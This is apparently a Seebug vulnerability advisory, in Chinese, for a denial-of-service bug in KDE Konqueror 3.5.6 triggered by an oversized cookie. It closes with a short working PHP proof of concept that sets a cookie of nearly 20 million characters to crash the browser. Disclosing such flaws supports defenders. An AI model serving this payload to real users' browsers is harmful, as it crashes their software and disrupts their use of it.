KDE Konqueror Cookie处理拒绝服务漏洞

2007-11-17T00:00:00
ID SSV:2439
Type seebug
Reporter Root
Modified 2007-11-17T00:00:00

Description

Konqueror是一款多功能的浏器,允许浏览本地和网络文件系统和全功能的WWW浏览器。 Konqueror处理COOKIE存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 当发送超大COOKIE,Konqueror处理时可导致崩溃,造成拒绝服务攻击。

KDE Konqueror 3.5.6

目前没有解决方案提供: <a href="http://www.konqueror.org/" target="_blank">http://www.konqueror.org/</a>

                                        
                                            
                                                &lt;?php
ini_set(&quot;memory_limit&quot;,&quot;200M&quot;);
setcookie(&quot;hi_fox&quot;, str_repeat(&quot;A&quot;,19999999));
?&gt;